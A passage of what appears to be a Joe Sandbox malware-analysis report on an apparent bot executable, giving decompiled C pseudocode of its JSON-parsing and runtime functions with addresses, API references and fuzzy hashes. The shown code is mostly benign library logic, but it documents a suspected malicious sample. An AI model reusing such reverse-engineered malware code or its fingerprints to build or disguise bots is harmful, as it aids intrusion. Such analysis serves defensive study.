						_t132 = _t57 & 0x000000ff;
						if((_t57 & 0x000000ff) == 0) {
							E00417720(_t78,  &_v48, _t132, _t135, _t136);
							continue;
						} else {
							_v32 =  *((intOrPtr*)(E0041AC60(_v8 + 4)));
							E00415940(_t137 - 0x10,  &_v48);
							_push( &_v80);
							E0040D8D0(_t78, _v32,  &_v48, _t136);
						}
						goto L17;
					}
				}
				L17:
				return 1;
			}

0x0041f190
0x0041f190
0x0041f190
0x0041f196
0x0041f19f
0x0041f1a4
0x0041f1a7
0x0041f1af
0x0041f1bf
0x0041f1d0
0x0041f1d3
0x0041f1ea
0x0041f214
0x0041f21e
0x0041f1ec
0x0041f1ec
0x0041f1f4
0x0041f1f8
0x0041f20a
0x0041f20a
0x0041f1ea
0x0041f229
0x0041f231
0x0041f233
0x0041f235
0x0041f244
0x0041f249
0x0041f249
0x0041f252
0x0041f257
0x0041f25a
0x0041f25c
0x0041f25e
0x0041f26d
0x0041f272
0x0041f272
0x0041f27b
0x0041f286
0x0041f29b
0x0041f2df
0x0041f2e9
0x0041f2f8
0x0041f2fe
0x0041f303
0x0041f305
0x0041f322
0x00000000
0x00000000
0x0041f32e
0x0041f333
0x0041f338
0x0041f2f3
0x00000000
0x0041f33a
0x0041f347
0x0041f353
0x0041f35b
0x0041f35f
0x0041f35f
0x00000000
0x0041f338
0x0041f2f8
0x0041f368
0x0041f36d

APIs

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 0041F318

Part of subcall function 00417DC0: std::ios_base::good.LIBCPMTD ref: 00417DCC
Part of subcall function 00417DC0: Concurrency::cancel_current_task.LIBCPMT ref: 00417DD8

Part of subcall function 00416EA0: swap.LIBCPMTD ref: 00416EBB

Strings

!ref_stack.empty(), xrefs: 0041F23F
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0041F23A, 0041F263
!keep_stack.empty(), xrefs: 0041F268

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Affinity::operator!=Concurrency::cancel_current_taskConcurrency::details::Hardwarestd::ios_base::goodswap
String ID: !keep_stack.empty()$!ref_stack.empty()$C:\Users\root\Desktop\bot v2\json.hpp
API String ID: 1325110470-1108838851
Opcode ID: 9a6651ce40757b270270fd4180fd3d7c878a8348ff1e250507e291d6017e2fcb
Instruction ID: 0701405159ca816f8692d9c4d284852bd7d662f461f03fc600e9f431bb8a24b8
Opcode Fuzzy Hash: 9a6651ce40757b270270fd4180fd3d7c878a8348ff1e250507e291d6017e2fcb
Instruction Fuzzy Hash: 26516374A001099FDB08EBA6D9516FE7371EF84308F54406EE5027B382DE386E55D79A

Uniqueness

Uniqueness Score: -1.00%

Function 0041FEA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041FEA0(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				char _v60;
				signed int _t57;
				signed int _t59;
				signed int _t66;
				signed int _t70;
				signed int _t91;
				signed int _t92;
				signed int _t108;
				void* _t109;

				_t107 = __esi;
				_t106 = __edi;
				_t81 = __ebx;
				_t57 =  *0x4c61a4; // 0x8656a166
				_v8 = _t57 ^ _t108;
				_v32 = __ecx;
				_t59 = _v32;
				_t111 =  *((intOrPtr*)(_t59 + 0xc)) - 0x75;
				if( *((intOrPtr*)(_t59 + 0xc)) != 0x75) {
					_push(0x19c6);
					E00430DB7(__ebx, __edx, __edi, __esi, _t111, L"current == \'u\'", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
					_t109 = _t109 + 0xc;
				}
				_v36 = 0;
				_v28 = 0xc;
				_v24 = 8;
				_v20 = 4;
				_v16 = 0;
				_t98 =  &_v12;
				E00415820( &_v60,  &_v28,  &_v12);
				_v48 =  &_v60;
				_v40 = E00417420(_v48);
				_v52 = E0041A400(_v48);
				while(_v40 != _v52) {
					_t98 =  *_v40;
					_v44 =  *_v40;
					E0041FC00(_v32);
					if( *((intOrPtr*)(_v32 + 0xc)) < 0x30 ||  *((intOrPtr*)(_v32 + 0xc)) > 0x39) {
						_t91 = _v32;
						__eflags =  *((intOrPtr*)(_t91 + 0xc)) - 0x41;
						if( *((intOrPtr*)(_t91 + 0xc)) < 0x41) {
							L11:
							_t70 = _v32;
							__eflags =  *((intOrPtr*)(_t70 + 0xc)) - 0x61;
							if( *((intOrPtr*)(_t70 + 0xc)) < 0x61) {
								L14:
								_t66 = _t70 | 0xffffffff;
							} else {
								_t92 = _v32;
								__eflags =  *((intOrPtr*)(_t92 + 0xc)) - 0x66;
								if( *((intOrPtr*)(_t92 + 0xc)) > 0x66) {
									goto L14;
								} else {
									_v36 = ( *((intOrPtr*)(_v32 + 0xc)) - 0x57 << _v44) + _v36;
									goto L15;
								}
							}
						} else {
							_t98 = _v32;
							__eflags =  *((intOrPtr*)(_t98 + 0xc)) - 0x46;
							if( *((intOrPtr*)(_t98 + 0xc)) > 0x46) {
								goto L11;
							} else {
								_v36 = ( *((intOrPtr*)(_v32 + 0xc)) - 0x37 << _v44) + _v36;
								goto L15;
							}
						}
					} else {
						_v36 = ( *((intOrPtr*)(_v32 + 0xc)) - 0x30 << _v44) + _v36;
						L15:
						_t98 = _v40 + 4;
						_v40 = _v40 + 4;
						continue;
					}
					L20:
					__eflags = _v8 ^ _t108;
					return E00424900(_t66, _t81, _v8 ^ _t108, _t98, _t106, _t107);
				}
				__eflags = _v36;
				if(__eflags < 0) {
					L18:
					_push(0x19e0);
					E00430DB7(_t81, _t98, _t106, _t107, __eflags, L"0x0000 <= codepoint && codepoint <= 0xFFFF", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				} else {
					__eflags = _v36 - 0xffff;
					if(__eflags > 0) {
						goto L18;
					}
				}
				_t66 = _v36;
				goto L20;
			}

0x0041fea0
0x0041fea0
0x0041fea0
0x0041fea6
0x0041fead
0x0041feb0
0x0041feb3
0x0041feb6
0x0041feba
0x0041febc
0x0041fecb
0x0041fed0
0x0041fed0
0x0041fed3
0x0041feda
0x0041fee1
0x0041fee8
0x0041feef
0x0041fef6
0x0041ff01
0x0041ff09
0x0041ff14
0x0041ff1f
0x0041ff2d
0x0041ff3c
0x0041ff3e
0x0041ff44
0x0041ff50
0x0041ff71
0x0041ff74
0x0041ff78
0x0041ff99
0x0041ff99
0x0041ff9c
0x0041ffa0
0x0041ffc1
0x0041ffc1
0x0041ffa2
0x0041ffa2
0x0041ffa5
0x0041ffa9
0x00000000
0x0041ffab
0x0041ffbc
0x00000000
0x0041ffbc
0x0041ffa9
0x0041ff7a
0x0041ff7a
0x0041ff7d
0x0041ff81
0x00000000
0x0041ff83
0x0041ff94
0x00000000
0x0041ff94
0x0041ff81
0x0041ff5b
0x0041ff6c
0x0041ffc6
0x0041ff27
0x0041ff2a
0x00000000
0x0041ff2a
0x0041fff4
0x0041fff7
0x00420001
0x00420001
0x0041ffcb
0x0041ffcf
0x0041ffda
0x0041ffda
0x0041ffe9
0x0041ffd1
0x0041ffd1
0x0041ffd8
0x00000000
0x00000000
0x0041ffd8
0x0041fff1
0x00000000

APIs

_Smanip.LIBCPMTD ref: 0041FF01

Strings

current == 'u', xrefs: 0041FEC6
0x0000 <= codepoint && codepoint <= 0xFFFF, xrefs: 0041FFE4
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0041FEC1, 0041FFDF

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Smanip
String ID: 0x0000 <= codepoint && codepoint <= 0xFFFF$C:\Users\root\Desktop\bot v2\json.hpp$current == 'u'
API String ID: 2140389272-2363913455
Opcode ID: 2879fc073b5a11a9c8fd238759f9d98e641dd9375cf48320a35d5e378bca7dac
Instruction ID: afb448fd7f116fe6ec62b1ef08f30a8f8a7152368c3b064c50c1481a4e38ba7e
Opcode Fuzzy Hash: 2879fc073b5a11a9c8fd238759f9d98e641dd9375cf48320a35d5e378bca7dac
Instruction Fuzzy Hash: 1E410670D00209DFDB04CF99D841AEEB7B1BF49314F24822AE415BB291D778A98BCF58

Uniqueness

Uniqueness Score: -1.00%

Function 00437886 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00437886(intOrPtr __edx, void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12, intOrPtr _a16, short* _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				void* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t36;
				signed int _t40;
				int _t43;
				int _t56;
				short* _t57;
				signed int _t58;
				void* _t59;
				short* _t60;

				_t55 = __edx;
				_t30 =  *0x4c61a4; // 0x8656a166
				_v8 = _t30 ^ _t58;
				E0042A0B3( &_v32, __edx, _a4);
				_t48 = _a24;
				if(_a24 == 0) {
					_t48 =  *((intOrPtr*)(_v28 + 8));
				}
				_t56 = 0;
				_t36 = E00432C10(_t48, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_t60 = _t59 + 0x18;
				_v16 = _t36;
				if(_t36 == 0) {
					L16:
					if(_v20 != 0) {
						 *(_v32 + 0x350) =  *(_v32 + 0x350) & 0xfffffffd;
					}
					return E00424900(_t56, _t48, _v8 ^ _t58, _t55, _t56, _t57);
				} else {
					_t55 = _t36 + _t36;
					_v12 = _t55;
					asm("sbb eax, eax");
					_t40 = _t36 & _t55 + 0x00000008;
					if(_t40 == 0) {
						_t57 = 0;
						L12:
						if(_t57 != 0) {
							E00427330(_t56, _t57, _t56, _t55);
							_t43 = E00432C10(_t48, 1, _a12, _a16, _t57, _v16);
							if(_t43 != 0) {
								_t56 = GetStringTypeW(_a8, _t57, _t43, _a20);
							}
						}
						E00437989(_t57);
						goto L16;
					}
					if(_t40 > 0x400) {
						_t57 = E00432552(_t40);
						if(_t57 == 0) {
							L10:
							_t55 = _v12;
							goto L12;
						}
						 *_t57 = 0xdddd;
						L9:
						_t57 =  &(_t57[4]);
						goto L10;
					}
					E0043F030(_t40);
					_t57 = _t60;
					if(_t57 == 0) {
						goto L10;
					}
					 *_t57 = 0xcccc;
					goto L9;
				}
			}

0x00437886
0x0043788e
0x00437895
0x004378a1
0x004378a6
0x004378ab
0x004378b0
0x004378b0
0x004378b5
0x004378ce
0x004378d3
0x004378d6
0x004378db
0x00437965
0x00437969
0x0043796e
0x0043796e
0x00437988
0x004378e1
0x004378e1
0x004378e7
0x004378ec
0x004378ee
0x004378f0
0x00437927
0x00437929
0x0043792b
0x00437930
0x00437942
0x0043794c
0x0043795c
0x0043795c
0x0043794c
0x0043795f
0x00000000
0x00437964
0x004378f7
0x00437912
0x00437917
0x00437922
0x00437922
0x00000000
0x00437922
0x00437919
0x0043791f
0x0043791f
0x00000000
0x0043791f
0x004378f9
0x004378fe
0x00437902
0x00000000
0x00000000
0x00437904
0x00000000
0x00437904

APIs

__alloca_probe_16.LIBCMT ref: 004378F9
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 00437956
__freea.LIBCMT ref: 0043795F

Part of subcall function 00432552: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,004248DC,00000000,?,004184DC,00000000,?,00407209,00000000), ref: 00432584

Strings

bnC, xrefs: 00437899

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: AllocateHeapStringType__alloca_probe_16__freea
String ID: bnC
API String ID: 2035984020-2696515679
Opcode ID: 4705004f1a89d425f02c0ea35cc39d6df71efb462528f5afed2e41fb993d05e1
Instruction ID: edd1556e3434198be82f68917e6801ee6a054273db327b602b45b13a731ee492
Opcode Fuzzy Hash: 4705004f1a89d425f02c0ea35cc39d6df71efb462528f5afed2e41fb993d05e1
Instruction Fuzzy Hash: 9D31F6B190011AABEB309F65DC41EAF7BB5EF48324F05122AFD44A7251D7398951CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004129C6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E004129C6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t62;
				signed int _t95;

				_t100 = __eflags;
				_t94 = __esi;
				_t93 = __edi;
				_t64 = __ebx;
				 *((intOrPtr*)(_t95 - 0x418)) = E00414FA0(_t95 - 0x46c, 0);
				E00415310(_t95 - 0x64, __eflags, "value");
				 *((intOrPtr*)(_t95 - 0x41c)) = E0041F5F0(__ebx,  *((intOrPtr*)(_t95 - 0x2a8)), __edi, __esi, __eflags, _t95 - 0x1cc, 0, _t95 - 0x64);
				 *((intOrPtr*)(_t95 - 0x414)) =  *((intOrPtr*)(_t95 - 0x2a8)) + 0x30;
				 *((intOrPtr*)(_t95 - 0x2e0)) = E00420140( *((intOrPtr*)(_t95 - 0x414)), _t95 - 0x558);
				 *((intOrPtr*)(_t95 - 0x2ec)) = E0040C460(__ebx, __edi, __esi, _t100, _t95 - 0x604, 0x65,  *((intOrPtr*)(_t95 - 0x2e0)),  *((intOrPtr*)(_t95 - 0x41c)),  *((intOrPtr*)(_t95 - 0x418)));
				 *((intOrPtr*)(_t95 - 0x2e4)) =  *((intOrPtr*)(_t95 - 0x2a8)) + 0x30;
				 *((intOrPtr*)(_t95 - 0x2f0)) = E004201C0(__ebx,  *((intOrPtr*)(_t95 - 0x2e4)), __edi, __esi, _t95 - 0x1b4);
				 *((intOrPtr*)(_t95 - 0x2e8)) =  *((intOrPtr*)(_t95 - 0x2a8)) + 0x30;
				 *((intOrPtr*)(_t95 - 0x2f4)) = E00417420(E00420140( *((intOrPtr*)(_t95 - 0x2e8)), _t95 - 0x564));
				_t92 =  *((intOrPtr*)(_t95 - 0x2ec));
				 *((char*)(_t95 - 0x2cc)) = E00412100( *((intOrPtr*)(_t95 + 8)),  *((intOrPtr*)(_t95 - 0x2f4)),  *((intOrPtr*)(_t95 - 0x2f0)),  *((intOrPtr*)(_t95 - 0x2ec)));
				E00416980(_t95 - 0x1b4);
				E00416D90(_t95 - 0x604);
				E00416980(_t95 - 0x1cc);
				E00416980(_t95 - 0x64);
				E00416950(_t95 - 0x46c);
				E00416CE0(_t95 - 0x2bc);
				_t62 =  *((intOrPtr*)(_t95 - 0x2cc));
				return E00424900(_t62, _t64,  *(_t95 - 4) ^ _t95, _t92, _t93, _t94);
			}

0x004129c6
0x004129c6
0x004129c6
0x004129c6
0x004129d3
0x004129e1
0x004129fe
0x00412a0d
0x00412a25
0x00412a51
0x00412a60
0x00412a78
0x00412a87
0x00412aa6
0x00412aac
0x00412ac9
0x00412ad5
0x00412ae0
0x00412aeb
0x00412af3
0x00412afe
0x00412b09
0x00412b0e
0x004133e0

APIs

Part of subcall function 0041F5F0: _Func_class.LIBCPMTD ref: 0041F619
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F658
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F660
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F716
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F71E
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F729
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F734
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F73F

Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C544
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C54C
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C554
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C55F
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C56A
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C572
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C57D
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C588
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C5C3

Part of subcall function 004201C0: task.LIBCPMTD ref: 0042028A

task.LIBCPMTD ref: 00412AD5
task.LIBCPMTD ref: 00412AEB
task.LIBCPMTD ref: 00412AF3

Strings

value, xrefs: 004129D9

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$Func_class
String ID: value
API String ID: 2726606658-494360628
Opcode ID: 42129313249383eb1fb8bed7ed10296f3b1e7911ec4511096c2ec1b5285c46b0
Instruction ID: 2aa334a60133eddb5b666ef875723d47d14a829b2753fd2ecb14e32cd8e8d84b
Opcode Fuzzy Hash: 42129313249383eb1fb8bed7ed10296f3b1e7911ec4511096c2ec1b5285c46b0
Instruction Fuzzy Hash: F9311AB0A401289BCB24EB55DC95BEEB3B9AF44304F5041EEA10DA7152DB345FC5CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00413C06 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00413C06(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t62;
				signed int _t95;

				_t100 = __eflags;
				_t94 = __esi;
				_t93 = __edi;
				_t64 = __ebx;
				 *((intOrPtr*)(_t95 - 0x418)) = E00414FA0(_t95 - 0x46c, 0);
				E00415310(_t95 - 0x64, __eflags, "value");
				 *((intOrPtr*)(_t95 - 0x41c)) = E0041F5F0(__ebx,  *((intOrPtr*)(_t95 - 0x2a8)), __edi, __esi, __eflags, _t95 - 0x1cc, 0, _t95 - 0x64);
				 *((intOrPtr*)(_t95 - 0x414)) =  *((intOrPtr*)(_t95 - 0x2a8)) + 0x30;
				 *((intOrPtr*)(_t95 - 0x2e0)) = E00420140( *((intOrPtr*)(_t95 - 0x414)), _t95 - 0x558);
				 *((intOrPtr*)(_t95 - 0x2ec)) = E0040C460(__ebx, __edi, __esi, _t100, _t95 - 0x604, 0x65,  *((intOrPtr*)(_t95 - 0x2e0)),  *((intOrPtr*)(_t95 - 0x41c)),  *((intOrPtr*)(_t95 - 0x418)));
				 *((intOrPtr*)(_t95 - 0x2e4)) =  *((intOrPtr*)(_t95 - 0x2a8)) + 0x30;
				 *((intOrPtr*)(_t95 - 0x2f0)) = E004201C0(__ebx,  *((intOrPtr*)(_t95 - 0x2e4)), __edi, __esi, _t95 - 0x1b4);
				 *((intOrPtr*)(_t95 - 0x2e8)) =  *((intOrPtr*)(_t95 - 0x2a8)) + 0x30;
				 *((intOrPtr*)(_t95 - 0x2f4)) = E00417420(E00420140( *((intOrPtr*)(_t95 - 0x2e8)), _t95 - 0x564));
				_t92 =  *((intOrPtr*)(_t95 - 0x2ec));
				 *((char*)(_t95 - 0x2cc)) = E00412130( *((intOrPtr*)(_t95 + 8)),  *((intOrPtr*)(_t95 - 0x2f4)),  *((intOrPtr*)(_t95 - 0x2f0)),  *((intOrPtr*)(_t95 - 0x2ec)));
				E00416980(_t95 - 0x1b4);
				E00416D90(_t95 - 0x604);
				E00416980(_t95 - 0x1cc);
				E00416980(_t95 - 0x64);
				E00416950(_t95 - 0x46c);
				E00416CE0(_t95 - 0x2bc);
				_t62 =  *((intOrPtr*)(_t95 - 0x2cc));
				return E00424900(_t62, _t64,  *(_t95 - 4) ^ _t95, _t92, _t93, _t94);
			}

0x00413c06
0x00413c06
0x00413c06
0x00413c06
0x00413c13
0x00413c21
0x00413c3e
0x00413c4d
0x00413c65
0x00413c91
0x00413ca0
0x00413cb8
0x00413cc7
0x00413ce6
0x00413cec
0x00413d09
0x00413d15
0x00413d20
0x00413d2b
0x00413d33
0x00413d3e
0x00413d49
0x00413d4e
0x00414620

APIs

Part of subcall function 0041F5F0: _Func_class.LIBCPMTD ref: 0041F619
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F658
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F660
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F716
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F71E
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F729
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F734
Part of subcall function 0041F5F0: task.LIBCPMTD ref: 0041F73F

Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C544
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C54C
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C554
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C55F
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C56A
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C572
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C57D
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C588
Part of subcall function 0040C460: task.LIBCPMTD ref: 0040C5C3

Part of subcall function 004201C0: task.LIBCPMTD ref: 0042028A

task.LIBCPMTD ref: 00413D15
task.LIBCPMTD ref: 00413D2B
task.LIBCPMTD ref: 00413D33

Strings

value, xrefs: 00413C19

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$Func_class
String ID: value
API String ID: 2726606658-494360628
Opcode ID: 147b52b526d2c68b1108ca9258691f092f9c56b049886883d36f7ec2b1a8ab5c
Instruction ID: f1abaadf24cd8b7b6c2e0e5e236bac91c90b3554dfe12244e1387a292197b966
Opcode Fuzzy Hash: 147b52b526d2c68b1108ca9258691f092f9c56b049886883d36f7ec2b1a8ab5c
Instruction Fuzzy Hash: D4311BB09501289BCB24EB55DC95BEEB3B9AF44304F5041EEA10D67152DB345FC5CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040C690 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040C690(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				void* _t22;
				signed char _t29;

				E00414F10( &_v5);
				E00414B10( &_v12,  &_v5);
				_t22 = E0041A590( &_v5, 1);
				_t6 =  &_v32; // 0x414a50
				E00404770(_t6, _t22,  &_v12);
				_v16 = E004075F0(_a4);
				_t9 =  &_v32; // 0x414a50
				_v20 = E0041A400(_t9);
				E0040BFF0(__eflags,  &_v5, _v20, _v16);
				_t14 =  &_v32; // 0x414a50
				_t29 = E00406080(_t14, _t14, 0);
				_t46 = _t29 & 0x000000ff;
				_t56 = _t29 & 0x000000ff;
				if((_t29 & 0x000000ff) == 0) {
					_push(0x44b5);
					E00430DB7(__ebx, _t46, __edi, __esi, _t56, L"obj != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				}
				_t15 =  &_v32; // 0x414a50
				_v24 = E00419BE0(_t15);
				_t17 =  &_v32; // 0x414a50
				E00416B60(_t17);
				return _v24;
			}

0x0040c699
0x0040c6a5
0x0040c6b4
0x0040c6bd
0x0040c6c0
0x0040c6d1
0x0040c6d4
0x0040c6dc
0x0040c6eb
0x0040c6f5
0x0040c6f9
0x0040c701
0x0040c704
0x0040c706
0x0040c708
0x0040c717
0x0040c71c
0x0040c71f
0x0040c727
0x0040c72a
0x0040c72d
0x0040c738

APIs

Part of subcall function 0041A590: _Allocate.LIBCONCRTD ref: 0041A5A0

operator!=.LIBCPMTD ref: 0040C6F9

Strings

obj != nullptr, xrefs: 0040C712
PJA, xrefs: 0040C6BD, 0040C6D4, 0040C6F5, 0040C71F, 0040C72A, 0040C6F8
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040C70D

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Allocateoperator!=
String ID: C:\Users\root\Desktop\bot v2\json.hpp$PJA$obj != nullptr
API String ID: 1702145254-2981918848
Opcode ID: fadd41f6d30924d5b778b781b9b987abcb435e9e134769c1c6c3f8c07032c679
Instruction ID: 6f092086f639a711374cee966dfa8f7945a7ef2dc561746902bb35725d3ccaeb
Opcode Fuzzy Hash: fadd41f6d30924d5b778b781b9b987abcb435e9e134769c1c6c3f8c07032c679
Instruction Fuzzy Hash: E41130B5D04209AACB04EBE1EC52AEFB378AF54304F00456AE50566182FB796619CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00434587 Relevance: 6.3, APIs: 4, Instructions: 320
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E00434587(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E0042A0B3( &_v60, _t163, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
